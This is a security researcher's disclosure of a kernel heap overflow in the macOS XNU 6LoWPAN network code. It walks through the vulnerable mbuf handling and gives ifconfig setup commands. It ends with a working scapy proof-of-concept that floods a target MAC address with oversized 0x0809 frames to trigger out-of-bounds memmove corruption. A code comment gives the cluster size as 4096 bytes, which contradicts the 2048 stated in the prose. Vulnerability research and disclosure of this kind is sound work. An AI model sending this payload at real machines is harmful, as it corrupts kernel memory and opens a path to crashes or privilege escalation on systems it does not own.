''' @i41nbeer
XNU network stack kernel heap overflow due to out-of-bounds memmove in 6lowpan

I stumbled across the 6LoWPAN [https://en.wikipedia.org/wiki/6LoWPAN] code which was recently added to XNU.

I'd never heard of 6LoWPAN before so googled '6LoWPAN XNU' and the first result was Alex Plaskett's writeup 
of CVE-2020-9967 [https://alexplaskett.github.io/CVE-2020-9967/] found with a CodeQL query. That vulnerability
is a neat integer issue due to insufficient validation of the length field in the 6LoWPAN header.

Alex's CodeQL query set the m_buf m_mtod method as a source and memmove as a sink and looked for paths between
those two methods. Reading the XNU code to understand Alex's vulnerability revealed another issue: the call to
m_mtod which is the source of untrusted data in Alex's CodeQL results is in fact *itself invalid*, and under
certain circumstances can lead to memory corruption later on. Let's take a look:

sixlowpan_input is the entrypoint for 6LoWPAN frames. The mbuf_t m contains the attacker controlled raw input frame: 

    static int
    sixlowpan_input(ifnet_t p, __unused protocol_family_t protocol,
        mbuf_t m, __unused char *frame_header)
    {
    ...

The code allocates a new m_buf cluster:

        /* Allocate an mbuf cluster for the 802.15.4 frame and uncompressed payload */
        mc = m_getcl(M_WAITOK, MT_DATA, M_PKTHDR);

They parse the length field:

       memcpy(&len, mtod(m, u_int8_t *), sizeof(u_int16_t));
	   len = ntohs(len);

They uses the m_copyback API to copy the input m_buf m into mc:
        for (m_temp = m, off = 0; m_temp != NULL; m_temp = m_temp->m_next) {
            if (m_temp->m_len > 0) {
                m_copyback(mc, off, m_temp->m_len, mtod(m_temp, void *));
                off += m_temp->m_len;
                }
        }

They validate that the length field in the frame isn't claiming to be larger than the frame:
        if (len > mc->m_pkthdr.len) {
            err = -1;
            goto err_out;
        }

The m_mtod API is then used to get a raw pointer to the frame data for parsing:

        frame802154_parse(mtod(mc, uint8_t *), len, &ieee02154hdr, &payload);

They pass the parsed payload back into the network stack:

        if (sixxlowpan_input(&ieee02154hdr, payload) != 0)
            ...

So what's wrong there?

m_bufs are fundamentally linked-lists of small chunks of data. You can individually allocate these small chucks
in a handful of individual sizes; but once you start manipulating them you have to be exceptionally careful
about where the raw pointer inside the m_buf points.

In this case they allocate a "cluster m_buf". What this really means is that they allocate an initial empty m_buf chain
of length 1 with a single raw buffer of 2048 bytes.

The calls to m_copyback will attempt to fill up this 2048 byte buffer, but when its full it doesn't get expanded.
Instead a new link is added to a second buffer and the copy then continues there. It will never be valid to
access more that 2048 bytes past the raw buffer pointer of that inital m_buf cluster allocation.

But that's exactly what can happen: the call to mtod just returns a raw pointer to that initial 2048 byte buffer.

That frame then gets parsed, with an output pointer in payload then sixxlowpan_input does some more processing,
which includes performing a memmove operation to shift the entire buffer down to overwrite the header in
sixxlowpan_uncompress.

So, can we get an input m_buf to sixlowpan_input with an overall length > 2048? Yes!

As Alex's writeup showed you can "attach" 6LoWPAN to any parent ethernet interface in XNU like this:

    sudo ifconfig 6lowpan create
    sudo ifconfig 6lowpan0 up
    sudo ifconfig 6lowpan0 6lowpansetdev en0

This means that any frames received by en0 which have an ethertype of 0x0809 will be sent to sixlowpan_input.

en0 is typically the wifi interface; but we can attach 6LoWPAN to any ether interface. The p2p interface family,
which is active by default has an mtu of 2304, but for an easy PoC I'm instead just attaching a gigabit ethernet adaptor
to my test machine and activating jumbo frame support, which means I have an interface with an MTU of 9000:

    en6: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 9000
    options=50b<RXCSUM,TXCSUM,VLAN_HWTAGGING,AV,CHANNEL_IO>
    ether a8:20:66:23:a5:5f 
    inet6 fe80::1086:acbe:b0f6:7652%en6 prefixlen 64 secured scopeid 0x4 
    nd6 options=201<PERFORMNUD,DAD>
    media: 1000baseT <full-duplex>
    status: active

Note that you might have to manually configure your ethernet adaptor to force 1000baseT with jumbo frames; you can
do that in the System Preferences Network pane. Select the interface, Advanced -> Hardware -> Configure = Manually
and select 1000baseT and an MTU of 9000 (jumbo)

After you've set up a gigabit adaptor with an MTU of 9000 you can create and attach the 6LoWPAN interface to it. Here I'll
use the en6 interface as shown above:

    sudo ifconfig 6lowpan create
    sudo ifconfig 6lowpan0 up
    sudo ifconfig 6lowpan0 6lowpansetdev en6

Then attach some other machine to the other end of the cable and ensure it's also got a gigabit adaptor with an MTU of 9000:

I'm running it on a raspberry pi 4b with a USB gigabit ethernet adaptor with the mtu set to 9000 like this:

    sudo ifconfig eth1 mtu 9000

Then run this python script on the machine connected to the other end of the gigabit link. This is a scapy script so you'll need
scapy installed. You can proobably do that like this:

  sudo apt-get install scapy

For a local kernel privilige escalation there's presumably a software-only way to get a raw frame like this injected as root
but using scapy on an external machine is much simpler.

Note that you don't have to change the mtu of the 6lowpan interface; it doesn't appear to be respected anywhere.

I have no idea under what circumstances 6LoWPAN is usually attached to a parent interface; this might not be a legit
remote vulnerability but it's still a local priv-esc attack surface.

Tested on MacOS 11.2.3 (20D91)
'''
from scapy.all import *
import binascii

# this needs to be the real target MAC
target_mac = 'a8:20:66:23:a5:5f'
src_mac    = 'aa:aa:bb:bb:cc:d9'

gigabit_interface_with_jumbo_support = 'eth1'


# 6lowpan BE u16 length field (8192)
# the frame is this long; but won't all fit inside a single mbuf cluster alloc (4096)
payload  = binascii.unhexlify('2000')

# valid enough header:
payload += binascii.unhexlify('0000000002')

# payload
payload += binascii.unhexlify('41'*8500)

frame = Ether(src=src_mac, dst=target_mac, type=0x0809) / Raw(payload)

for i in range(1000):
    sendp(frame, iface=gigabit_interface_with_jumbo_support)

